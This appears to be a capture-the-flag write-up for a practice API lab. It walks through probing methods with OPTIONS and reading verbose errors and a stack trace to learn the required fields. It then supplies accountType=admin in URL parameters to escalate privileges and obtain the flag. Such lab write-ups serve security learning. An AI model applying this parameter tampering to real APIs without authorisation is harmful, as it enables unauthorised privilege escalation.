FREE API HACKING LABS http://23.239.9.22:5006/ What's wrong with my API? Can you screenshot me part of the flag in a comment? Please RT for reach <3

# Challenge
Browsing to the root site it gives us a 405 which means method is not allowed. I'll also be using Postman (cuz thats all the cool kids use for APIs)

```http
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<title>405 Method Not Allowed</title>

<h1>Method Not Allowed</h1>

<p>The method is not allowed for the requested URL.</p>
```
Okay we can check what method we can use using OPTIONS.
```http
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Allow: POST, OPTIONS
Content-Length: 0
Server: Werkzeug/1.0.1 Python/2.7.17
Date: Tue, 31 Aug 2021 13:52:09 GMT
```
Okay so we can only use POST.
When we send a POST request we get this response
```http
paths '/api/v1/changeUserSettings'
```
Okay so it wants us to POST there.
```http
Error: No username field provided. Please specify an accountType,name,firstname and adress.
```
Okay so we have fields we need to enter.
```http
POST /api/v1/changeUserSettings?username=faris HTTP/1.1
Host: 23.239.9.22:5006
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Content-Type: application/xml
Content-Length: 155

username=test&name=test&accountType=user&firstname=test&adress=test
```
If put the field in the body it still gives us an error.
What if we try in the URL?
```http
http://23.239.9.22:5006/api/v1/changeUserSettings?username=test
```
We get a stacktrace information error! 
Looking at the information given, it was expecting a `name` field.
Let's give that too.
```http
http://23.239.9.22:5006/api/v1/changeUserSettings?username=test&name=test
```
```txt
Error: No firstname field provided. Please specify an accountType,name,firstname and adress.
```
Great! Now we just need to fill in the blanks.
But I'm interested what accountTypes are available.
```http
http://23.239.9.22:5006/api/v1/changeUserSettings?username=test&name=test&firstname=test&adress=test
```
```txt
Error: No type field provided. Please specify an accountType,name,firstname and adress. The type can be either user or
reader
```
Okay so there is 2 types, but we're not interested in those, perhaps admin?
```http
http://23.239.9.22:5006/api/v1/changeUserSettings?username=test&name=test&firstname=test&adress=test&accountType=admin
```
```txt
Good job!! Flag: (21384324-03240324)
```

What we can learn here is TRY HARDER. Test everything parameter that is possible. Before testing out the URL, I tested out with some XML inputs incase it errors out or anything. Finally I decided to test the URL parameters and got it!